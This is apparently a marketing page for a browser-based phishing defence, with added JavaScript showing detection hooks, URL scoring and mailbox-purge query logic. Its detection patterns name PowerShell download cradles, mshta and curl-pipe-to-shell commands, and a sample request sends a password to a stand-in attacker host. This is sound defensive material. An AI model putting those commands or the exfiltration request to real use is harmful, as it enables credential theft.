Phishing defense that works at the point of click
HijackShield detects and blocks every major corporate phishing technique in the browser — before credentials are entered, before malware downloads, before damage is done. When a page is blocked, zero-touch remediation traces the click back to the source email, classifies it, and purges every copy from every mailbox in the tenant — automatically, with no user or analyst action.
Three layers of protection. One browser extension.
Email & credential phishing
Cloned sign-in pages, fake login windows, remote-controlled browser sessions, and device-code consent scams — the Phishing-as-a-Service kits behind modern MFA-bypass attacks.
Malicious & compromised websites
Brand impersonation, ClickFix and tech-support scams, drive-by dangerous downloads, fraudulent online stores, and browser push-notification abuse.
Weaponized documents
Detects accounts-payable invoice fraud and PDFs built to exploit known document vulnerabilities (CVEs) — a first-pass screen that cuts manual review.
Email filters miss. Phishing lands. Then what?
Every email gateway misses phishing. Modern PhaaS kits evade security scanners with anti-analysis detection, CAPTCHA gates, and anti-debugger traps. BEC emails from compromised trusted senders often bypass filters entirely, especially when companies allow-list customer domains or employees create inbox rules so they never miss a message. By the time the SOC finds the threat, users have already clicked.
of breaches start with a phishing email that bypassed email security
typical time for SOC to manually find and purge phishing emails from all mailboxes
HijackShield automated remediation: user report to tenant-wide purge across all mailboxes
Real users on real machines defeat evasion
Email gateways analyze URLs in sandboxes. Phishing kits detect sandboxes and show clean pages. HijackShield runs in the user's actual browser on their actual endpoint — the kit's evasion defenses see a real user and present the real phishing page.
Two outcomes, both wins: either the phishing page renders and HijackShield blocks it instantly, or the kit exits early and the user never sees a threat. Evasion built to fool sandboxes is irrelevant at the browser layer.
For BEC attacks, HijackShield evaluates the page the link points to, not the email that delivered it. Sender reputation, inbox rules, Exchange allow lists: none of it matters. A phishing page is a phishing page regardless of who sent the link.
Why the browser layer wins
Every evasion that defeats a gateway is irrelevant to HijackShield — either the page renders and we block it, or it never renders and there's nothing to steal.
Two components. Entirely local detection.
No cloud dependency for protection. No round-trip latency. No data leaving the device for the scoring decision. Detection runs on-device on Windows today, with macOS on the near-term roadmap.
Browser extension scans every page
Works across Chrome, Edge, Brave, Opera, and Firefox. Analyzes the live DOM for phishing signals — login forms, brand impersonation, credential harvesting, hidden content loaded via JavaScript, and active credential theft behavior.
Local agent scores and decides
The on-device Go agent runs a hybrid ML model and 100+ heuristic rules. BLOCK, WARN, or ALLOW in milliseconds — with explainable reason tags showing exactly which detections fired and why.
Sentinel receives structured telemetry
Every detection and phishing report flows into Microsoft Sentinel with full context — device identity, detection tags, PhaaS kit fingerprint, email metadata — for automated response.
Every major phishing technique. Detected and blocked.
HijackShield is a behavior-based phishing defense — not a reputation checker or static page scanner. It combines an on-device ML model with deep heuristic analysis of rendered page content, browser-executed behavior, and active credential theft patterns.
AiTM proxy attacks
Detects the proxy-based attacks that bypass MFA through multiple independent layers: AiTM toolkit URL pattern analysis, full-viewport cross-origin iframe detection, client-side CAPTCHA gate detection, invisible Unicode obfuscation, and cloud static hosting fingerprinting. Covers Sneaky 2FA, Tycoon 2FA, EvilProxy, Salty 2FA, and Mamba 2FA.
Browser-in-the-Middle (BitM)
Identifies remote desktop streaming attacks via noVNC and Apache Guacamole using a 6-tier weighted indicator system — VNC infrastructure detection, full-viewport canvas analysis, keyboard event capture, and WebSocket inspection.
Browser-in-Browser (BitB)
Detects fake browser windows rendered in HTML that display spoofed URL bars showing legitimate domains like login.microsoftonline.com. Identifies window control elements, fake address bars, navigation buttons, and hardcoded IdP URLs in page content.
Device code phishing
Catches OAuth 2.0 Device Authorization Grant abuse, cross-brand lures (e.g., DocuSign-branded pages redirecting to Microsoft device login), and copy-paste instruction sequences.
Brand impersonation suite
Purpose-built detection for Microsoft, Google, Okta, Meta, LinkedIn, Amazon, and Apple impersonation — including ESTS login cloning, OTP/MFA flow faking, CSS logo recreation, and CDN asset analysis.
ClickFix attacks
Detects fake CAPTCHA pages that trick users into pasting and running malicious PowerShell via Win+R. Detection covers clipboard manipulation, script pattern analysis, and suspicious iframes.
Hidden content & credential theft
Inspects browser-executed network behavior — not just the visible DOM. Catches phishing kits that load content via JavaScript POST requests and detects active credential exfiltration via fetch/XHR to suspicious endpoints.
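What the browser-side behaviour checks can look like in practice, as an added example that is not HijackShield's own code: main-world hooks on fetch() and navigator.clipboard.writeText that a content script could install. The one block serves both the ClickFix clipboard point above and the credential-exfiltration point here. The page origin, the secret values, the credential field names, the command patterns and the sample requests are constructed assumptions, not the product's rules.

```javascript
// Added example, not HijackShield's own code. Page origin, field names, command
// patterns and the walk-through request below are constructed assumptions.

// Form-field keys that usually carry a secret (form-encoded or JSON bodies).
const CREDENTIAL_KEYS = /(^|[&?{,\s"'])(pass(word|wd)?|pwd|passwd|otp|mfa(code)?|totp|token)["']?\s*[=:]/i;

// Command shapes ClickFix pages copy to the clipboard for the user to paste into Win+R.
const CLICKFIX_PATTERNS = [
  ['powershell_hidden_or_encoded', /\bpowershell(\.exe)?\b.*?(-e(nc|ncodedcommand)?\b|-w(indowstyle)?\s+hidden|-nop(rofile)?\b)/i],
  ['powershell_download_cradle', /\b(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b/i],
  ['mshta_remote', /\bmshta(\.exe)?\s+["']?https?:/i],
  ['cmd_shell', /\bcmd(\.exe)?\s+\/[ck]\b/i],
  ['curl_pipe_shell', /\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba)?sh\b/i],
];

// Normalise a fetch() call into something inspectable. FormData and URLSearchParams
// both expose entries(); other body types are treated as opaque.
function describeRequest(input, init = {}, pageOrigin) {
  const href = typeof input === 'string' ? input : (input.href || input.url);
  const url = new URL(href, pageOrigin);
  const method = (init.method || input.method || 'GET').toUpperCase();
  let body = '';
  if (typeof init.body === 'string') body = init.body;
  else if (init.body && typeof init.body.entries === 'function') {
    body = [...init.body.entries()].map(([k, v]) => `${k}=${typeof v === 'string' ? v : ''}`).join('&');
  }
  return { url, method, body };
}

// `secrets` are the current values of password/OTP inputs on the page (read from the
// DOM in a real content script). A legitimate login POSTs them to its own origin;
// a phishing kit POSTs them somewhere else.
function inspectRequest(req, pageOrigin, secrets) {
  if (req.method !== 'POST' || !req.body) return null;
  const crossOrigin = req.url.origin !== pageOrigin;
  const leaked = secrets.filter(s => s.length >= 6 && (req.body.includes(s) || req.body.includes(encodeURIComponent(s))));
  if (leaked.length && crossOrigin) return { tag: 'credential_exfil_cross_origin', to: req.url.origin, severity: 'BLOCK' };
  if (leaked.length) return { tag: 'credential_post_same_origin', to: req.url.origin, severity: 'INFO' };
  if (crossOrigin && CREDENTIAL_KEYS.test(req.body)) return { tag: 'credential_shaped_post_cross_origin', to: req.url.origin, severity: 'WARN' };
  return null;
}

// Wrap window.fetch. `report` receives the finding and returns the action to take.
function makeMonitoredFetch(realFetch, pageOrigin, getSecrets, report) {
  return function monitoredFetch(input, init) {
    const finding = inspectRequest(describeRequest(input, init, pageOrigin), pageOrigin, getSecrets());
    if (finding && report(finding) === 'BLOCK') {
      return Promise.reject(new TypeError('request blocked: ' + finding.tag));
    }
    return realFetch(input, init);
  };
}

// Clipboard side: tag command-like payloads before navigator.clipboard.writeText runs.
function inspectClipboardPayload(text) {
  const tags = CLICKFIX_PATTERNS.filter(([, re]) => re.test(text)).map(([name]) => name);
  if (/win\s*\+\s*r|not a robot|verification id/i.test(text)) tags.push('clickfix_lure_text');
  return tags;
}

function makeMonitoredClipboardWrite(realWriteText, report) {
  return function writeText(text) {
    const tags = inspectClipboardPayload(String(text));
    if (tags.length && report({ tag: 'clipboard_command_injection', tags, severity: 'BLOCK' }) === 'BLOCK') {
      return Promise.resolve(); // swallow the write; the user's clipboard stays untouched
    }
    return realWriteText(text);
  };
}

// Constructed walk-through: a page on sso.example.test posts a captured password to a collector.
const PAGE_ORIGIN = 'https://sso.example.test';
const findings = [];
const sampleFetch = makeMonitoredFetch(
  async () => ({ ok: true }),                 // stands in for the real window.fetch
  PAGE_ORIGIN,
  () => ['hunter2hunter2'],                    // would be the page's password input values
  f => { findings.push(f); return f.severity; },
);
sampleFetch('https://collector.attacker.test/log', { method: 'POST', body: 'u=jane&p=hunter2hunter2' })
  .catch(err => console.log(err.message, findings));
```

In a real extension the wrappers would replace window.fetch and navigator.clipboard.writeText from a script injected into the page's main world (an MV3 content script runs in an isolated world and cannot see the page's own fetch), and getSecrets would read the current values of password and one-time-code inputs from the DOM. Two gaps worth knowing about: the same interposition is needed for XMLHttpRequest, navigator.sendBeacon and plain form submissions, and a kit can sidestep prototype hooks by taking a fresh fetch from a newly created iframe, which is why network-level checks belong alongside DOM ones.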
Government impersonation
Covers 36 US agencies including 25 state DMVs, 3 toll systems (E-ZPass, SunPass, FasTrak), and 8 federal agencies (IRS, USPS, SSA). Detects kit fingerprints, CMS clones, and payment urgency scams.
Fraudulent e-commerce
Identifies BogusBazaar, CajiPay, and Cloud-Keeper card skimming operations with cross-origin iframe detection, platform mismatch analysis, and payment gateway fingerprinting.
Dangerous download protection
Multi-layer download protection with 82+ Remote Access Tool patterns (AnyDesk, TeamViewer, ScreenConnect, and more) and 90+ Potentially Unwanted Program signatures. Detects deceptive filenames and double extensions.
PhaaS kit fingerprinting
Identifies the specific kit responsible — Sneaky 2FA, Tycoon 2FA, EvilProxy, Salty 2FA, Mamba 2FA, EvilnoVNC, and Device Code Phishing — giving SOC teams immediate attribution on every blocked page.
Info-stealer detection
The local Go agent monitors credential stores (browser login data, cookies, tokens) for unauthorized access by non-browser processes. Detects Lumma, RedLine, Vidar, StealC, and other info-stealer malware targeting saved credentials.
Plus: blob URL credential harvesting, phishing kit DOM fingerprinting, HTML smuggling, tech support scam detection, cryptojacking prevention, SPA phishing kits, 24 optional security protections, and QR code phishing (quishing) delivery tagging.
Hybrid ML + heuristic scoring. Explainable decisions.
HijackShield doesn't rely on a single model or a reputation database. Every page is evaluated by an on-device ML URL classifier and a deep heuristic engine that analyzes 100+ signals from the rendered page, browser-executed behavior, and network activity.
The result is a composite score with full transparency. Every BLOCK and WARN decision includes reason tags showing exactly which detections fired — from specific brand impersonation indicators to phishing kit DOM patterns to credential exfiltration behavior. SOC analysts and end users alike can see why a page was blocked.
False positive mitigation is built into the scoring engine with legitimacy evidence signals: federated SSO buttons, payment processors, marketing analytics stacks, cookie consent frameworks, social brand links, and Schema.org markup all reduce scores. A sticky legitimacy cache preserves trust signals across late-arriving frame updates on complex sites.
What the scoring engine evaluates
URL classifier: phishing probability from URL structure — typosquats, entropy, abused TLDs, lure keywords, punycode, path patterns
Rendered page: login forms, brand assets, phishing kit DOM patterns, MFA impersonation, hidden login flows, text obfuscation
Browser-executed behavior: POST-loaded phishing content, credential exfiltration via fetch/XHR, clipboard manipulation, anti-debugging traps
Hosting and infrastructure: cloud static hosting, hex subdomain patterns, cross-origin iframes, suspicious external scripts, AiTM toolkit URLs
Legitimacy evidence (lowers the score): federated SSO, payment processors, marketing stacks, cookie consent, social brand links, service workers, Schema.org
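The URL-structure and hosting signals from that list, worked through as an added example rather than HijackShield's own classifier: a scorer that tags typosquats, punycode hosts, abused TLDs, lure keywords, an email address in the URL, hex subdomains, cloud static hosting and near-random labels, then maps the composite score to BLOCK, WARN or ALLOW. The brand list, TLD list, lure words, static-hosting suffixes, weights and the 25/50 thresholds are assumptions chosen for illustration, and the registrable-domain guess is deliberately naive.

```javascript
// Added example, not HijackShield's own code. All lists, weights and thresholds
// below are assumptions for illustration.

const BRAND_TOKENS = ['microsoft', 'office', 'okta', 'google', 'docusign', 'paypal'];
const KNOWN_BRAND_DOMAINS = new Set(['microsoft.com', 'microsoftonline.com', 'live.com', 'office.com',
  'okta.com', 'google.com', 'docusign.com', 'paypal.com']);
const ABUSED_TLDS = new Set(['top', 'xyz', 'icu', 'cfd', 'buzz', 'click', 'zip', 'mov']);
const STATIC_HOSTS = ['pages.dev', 'web.app', 'netlify.app', 'github.io', 'r2.dev', 'blob.core.windows.net'];
const LURE_WORDS = ['login', 'signin', 'verify', 'secure', 'account', 'update', 'mfa', 'sso', 'auth', 'password'];
const EMAIL_IN_URL = /[\w.+-]+@[\w-]+(\.[\w-]+)*\.[a-z]{2,}/i;

// Shannon entropy in bits per character; a near-uniform character mix reads as random.
function entropy(s) {
  if (!s) return 0;
  const counts = new Map();
  for (const ch of s) counts.set(ch, (counts.get(ch) || 0) + 1);
  let h = 0;
  for (const n of counts.values()) { const p = n / s.length; h -= p * Math.log2(p); }
  return h;
}

// Optimal-string-alignment distance (Levenshtein plus adjacent transpositions) for typosquats.
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, (_, i) => [i, ...Array(b.length).fill(0)]);
  for (let j = 0; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1);
      }
    }
  }
  return d[a.length][b.length];
}

function scoreUrl(raw) {
  const url = new URL(raw);                    // WHATWG parser lower-cases and IDNA-encodes the host
  const labels = url.hostname.split('.');
  const tld = labels[labels.length - 1];
  const registrable = labels.slice(-2).join('.'); // naive: no public-suffix list
  const tags = [];
  let score = 0;

  if (KNOWN_BRAND_DOMAINS.has(registrable)) return { verdict: 'ALLOW', score: 0, tags: ['known_brand_domain'] };

  if (labels.some(l => l.startsWith('xn--'))) { tags.push('punycode_host'); score += 30; }
  if (ABUSED_TLDS.has(tld)) { tags.push(`abused_tld:${tld}`); score += 15; }
  if (STATIC_HOSTS.some(s => url.hostname.endsWith('.' + s))) { tags.push('cloud_static_hosting'); score += 15; }
  if (labels.slice(0, -2).some(l => /^[0-9a-f]{16,}$/.test(l))) { tags.push('hex_subdomain'); score += 15; }

  // Brand names in host labels (exact or within edit distance 2) or in the path.
  const pathText = (url.pathname + url.search + url.hash).toLowerCase();
  const hostTokens = labels.slice(0, -1).flatMap(l => l.split('-'));
  brands: for (const b of BRAND_TOKENS) {
    for (const t of hostTokens) {
      if (t.includes(b)) { tags.push(`brand_in_host:${b}`); score += 25; break brands; }
      if (t.length >= 5 && editDistance(t, b) <= 2) { tags.push(`typosquat:${b}`); score += 25; break brands; }
    }
    if (pathText.includes(b)) { tags.push(`brand_in_path:${b}`); score += 15; break brands; }
  }

  const lures = LURE_WORDS.filter(w => (url.hostname + pathText).includes(w));
  if (lures.length) { tags.push(`lure_keywords:${lures.join(',')}`); score += 8 * Math.min(lures.length, 3); }
  if (EMAIL_IN_URL.test(pathText)) { tags.push('email_in_url'); score += 10; }
  // Threshold 3.8 bits only fires on long labels with almost no repeated characters.
  if (labels.some(l => { const c = l.replace(/-/g, ''); return c.length >= 12 && entropy(c) >= 3.8; })) {
    tags.push('high_entropy_label'); score += 10;
  }

  const verdict = score >= 50 ? 'BLOCK' : score >= 25 ? 'WARN' : 'ALLOW';
  return { verdict, score, tags };
}

// Constructed sample URLs: a real IdP, a typosquat kit, a hex-named static host, an IDN host.
for (const u of [
  'https://login.microsoftonline.com/common/oauth2/authorize',
  'https://micros0ft-login.secure-verify.top/auth/index.php?email=jane@example.com',
  'https://a3f9c2b1d4e5f607.pages.dev/',
  'https://xn--micrsoft-8ya.com/login',
]) console.log(u, scoreUrl(u));
```

Because the URL parser converts Unicode hostnames to their xn-- form before the checks run, a homoglyph domain typed with Cyrillic letters lands in the punycode branch without any separate handling. The reason tags are the point: the same tags that drive the verdict are what an analyst later reads in the Sentinel event.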
Zero-touch remediation. Every copy purged in minutes.
The moment a page is blocked, HijackShield analyzes the redirect chain to identify the clicked link, queries Microsoft Graph to find the source email and classify it, then drives a tenant-wide search and soft-delete through Sentinel. No user report. No analyst intervention. No manual Defender Threat Explorer searches.
Remediation is fast by design: the purge runs as a metadata Compliance Search against the mailbox index rather than a crawl of message bodies, so it completes in minutes even across a large tenant. In testing across 1,372 mailboxes, the full pipeline — block to tenant-wide purge — completed in roughly 8 minutes end to end. A user-report path remains available too, which covers BYOD, contractors, and other unmanaged-device scenarios.
Three-scenario intelligence
Every blocked phish is auto-classified as External Phish, BEC Compromise, or Internal ATO — each triggers a different automated response appropriate to the severity.
BEC-safe purging
For known-sender BEC incidents, searches are scoped to sender AND subject — protecting legitimate past correspondence while eliminating the attack.
Internal ATO response
Internal sender incidents skip automated purge and post investigation guidance: revoke sessions, reset password, audit Entra sign-ins, check OAuth app consents.
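The triage and query scoping described in the three scenarios above, as an added example that is not HijackShield's code: a classifier that picks External Phish, BEC Compromise or Internal ATO, and the Compliance Search query each one drives. Tenant domains, the sample messages, the prior-correspondence lookup and the dry-run flag are constructed assumptions. The composite-authentication check that keeps a spoofed internal From out of the Internal ATO branch, and the subject scoping applied to such spoofs, are this example's additions rather than something the page states.

```javascript
// Added example, not HijackShield's own code. Tenant domains, messages, the
// correspondence lookup and the dry-run flag are constructed assumptions.

const INTERNAL_ATO_GUIDANCE = ['revoke sessions', 'reset password', 'audit Entra sign-ins', 'check OAuth app consents'];

// `authPassed` is the message's composite authentication result (DMARC/ARC). An
// internal-looking From that failed it is a spoof from outside, not a compromised
// internal account, so it must not be treated as Internal ATO.
function classifyIncident(msg, tenantDomains, hasPriorCorrespondence) {
  const sender = msg.from.toLowerCase();
  const domain = sender.split('@')[1] || '';
  const internal = tenantDomains.includes(domain);
  if (internal && msg.authPassed) return 'InternalATO';
  if (!internal && hasPriorCorrespondence(sender)) return 'BECCompromise';
  return 'ExternalPhish';
}

// KQL phrase terms match within the subject, so stripping reply/forward prefixes
// lets the seed subject cover the whole thread; quotes are dropped so they cannot
// break the query string.
function normalizeSubject(subject) {
  return subject.replace(/^(\s*(re|fw|fwd)\s*:)+/i, '').replace(/"/g, ' ').replace(/\s+/g, ' ').trim();
}

// Scope: always the sender and a received-date floor; add the subject for a known
// sender (BEC) or a spoofed internal address, so legitimate past mail from that
// address survives the purge.
function buildSearchQuery(scenario, msg, receivedSince, tenantDomains) {
  const sender = msg.from.toLowerCase();
  const spoofedInternal = tenantDomains.includes(sender.split('@')[1] || '');
  const terms = [`from:"${sender}"`];
  if (scenario === 'BECCompromise' || spoofedInternal) terms.push(`subject:"${normalizeSubject(msg.subject)}"`);
  terms.push(`received>=${receivedSince}`);
  return terms.join(' AND ');
}

function buildRemediationPlan(msg, ctx) {
  const scenario = classifyIncident(msg, ctx.tenantDomains, ctx.hasPriorCorrespondence);
  if (scenario === 'InternalATO') {
    return { scenario, action: 'INVESTIGATE', query: null, guidance: INTERNAL_ATO_GUIDANCE };
  }
  return {
    scenario,
    action: ctx.dryRun ? 'REPORT_ONLY' : 'SOFT_DELETE', // soft delete keeps items recoverable
    query: buildSearchQuery(scenario, msg, ctx.receivedSince, ctx.tenantDomains),
    guidance: [],
  };
}

// Constructed walk-through: one tenant, one known supplier, four messages.
const CTX = {
  tenantDomains: ['contoso.test'],
  hasPriorCorrespondence: addr => addr === 'ap@partner.test',
  receivedSince: '2024-05-01',
  dryRun: true,
};
for (const msg of [
  { from: 'AP@partner.test', subject: 'RE: Invoice "Q3" overdue', authPassed: true },
  { from: 'billing@random.test', subject: 'Payment due', authPassed: true },
  { from: 'cfo@contoso.test', subject: 'Urgent wire', authPassed: false },
  { from: 'cfo@contoso.test', subject: 'Urgent wire', authPassed: true },
]) console.log(buildRemediationPlan(msg, CTX));
```

The returned query string is the form New-ComplianceSearch -ContentMatchQuery accepts, with New-ComplianceSearchAction -Purge -PurgeType SoftDelete as the follow-up once dry run is switched off. The received-date floor matters for the BEC case: the same supplier and subject may have produced legitimate mail for years, and only the window around the compromise should be touched.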
Self-documenting incidents
Every remediation run posts a formatted summary to the Sentinel incident: items found, items purged, affected mailboxes, and full audit trail.
Dry run by default
Ships with Dry Run enabled. Validate the automation on real incidents before enabling live purge. Soft-delete only, nothing is permanently removed: purged items move to the mailbox's Recoverable Items folder, from which they can be restored.
Near-zero infrastructure cost
Sentinel and Logic Apps are pay-as-you-go. HijackShield generates kilobytes per alert. Even organizations that don’t use Sentinel today can spin up an instance specifically for this pipeline at essentially no cost.
Local detection. Cloud response.
Detection runs entirely on-device on Windows today, with macOS on the near-term roadmap. Sentinel integration adds enterprise telemetry and automated remediation without creating a dependency on cloud availability.
No cloud dependency
Detection works offline, on VPN, behind firewalls. No round-trip latency, no page content leaving the device for scoring, no single point of failure. The agent is the only component that makes outbound calls.
Resilient delivery
Events that fail to deliver to Sentinel are queued to disk and retried with exponential backoff for up to 24 hours. An Azure outage shorter than that window causes no data loss.
Works with any Microsoft 365
Automated remediation uses Compliance Search, available on every M365 plan from Business Basic up. No Defender for Office 365 Plan 2 or E5 upgrade required. Note that a single Compliance Search purge action removes at most 10 matching items per mailbox, so a large campaign may need repeated actions or a narrower query. Sentinel and Logic Apps are pay-as-you-go at negligible cost for alert-driven workloads.
NRT analytics rules
Pre-built Sentinel rules fire on every new event with dynamic severity, entity mapping, campaign grouping, and importable ARM templates.
Stop phishing at the point of click
Deploy HijackShield in minutes. Detect every major phishing technique. Automate tenant-wide remediation.